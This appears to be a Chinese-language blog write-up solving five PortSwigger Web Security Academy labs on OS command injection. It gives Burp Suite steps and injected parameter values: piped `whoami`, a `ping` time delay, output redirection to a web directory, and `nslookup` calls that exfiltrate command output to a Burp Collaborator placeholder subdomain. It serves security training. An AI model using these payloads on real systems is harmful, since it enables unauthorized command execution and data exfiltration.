操作系统命令注入,简单案例
lab
实验室:操作系统命令注入,简单案例 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改检查库存水平的请求。
- 修改参数,为其指定值 。
storeID
`1|whoami` - 请注意,响应包含当前用户的名称。
具有时间延迟的盲目操作系统命令注入
lab
实验室:具有时间延迟的盲目操作系统命令注入 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改提交反馈的请求。
修改参数,将其更改为:
email
email=x||ping+-c+10+127.0.0.1||
- 请注意,响应需要 10 秒才能返回。
具有输出重定向的盲操作系统命令注入
lab
实验室:使用输出重定向的盲操作系统命令注入 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改提交反馈的请求。
修改参数,将其更改为:
email
email=||whoami>/var/www/images/output.txt||
- 现在使用 Burp Suite 拦截和修改加载产品映像的请求。
修改参数,将值更改为为注入命令的输出指定的文件的名称:
filename
filename=output.txt
- 请注意,响应包含注入命令的输出。
具有带外交互的盲操作系统命令注入
lab
实验室:具有带外交互的盲操作系统命令注入 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite 拦截和修改提交反馈的请求。
修改参数,将其更改为:
email
email=x||nslookup+x.BURP-COLLABORATOR-SUBDOMAIN||
- 右键单击并选择“插入协作者有效负载”以插入修改后的参数中指示的 Burp 协作者子域。
email
带外数据泄露的盲 OS 命令注入
lab
实验室:带有带外数据外泄的盲目 OS 命令注入 |网络安全学院 (portswigger.net)
solve
- 使用 Burp Suite Professional 拦截和修改提交反馈的请求。
- 转到“协作者”选项卡。
- 单击“复制到剪贴板”,将唯一的 Burp Collaborator 有效负载复制到剪贴板。
修改参数,将其更改为如下所示,但在指示的位置插入 Burp Collaborator 子域:
email
email=||nslookup+`whoami`.BURP-COLLABORATOR-SUBDOMAIN||
- 返回“协作者”选项卡,然后单击“立即投票”。您应该会看到一些由应用程序发起的 DNS 交互,这些交互是有效负载的结果。如果未列出任何交互,请等待几秒钟,然后重试,因为服务器端命令是异步执行的。
- 请注意,命令的输出显示在交互的子域中,您可以在“协作者”选项卡中查看它。查找的完整域名将显示在交互的“描述”选项卡中。
- 若要完成实验,请输入当前用户的名称。
评论0
暂时没有评论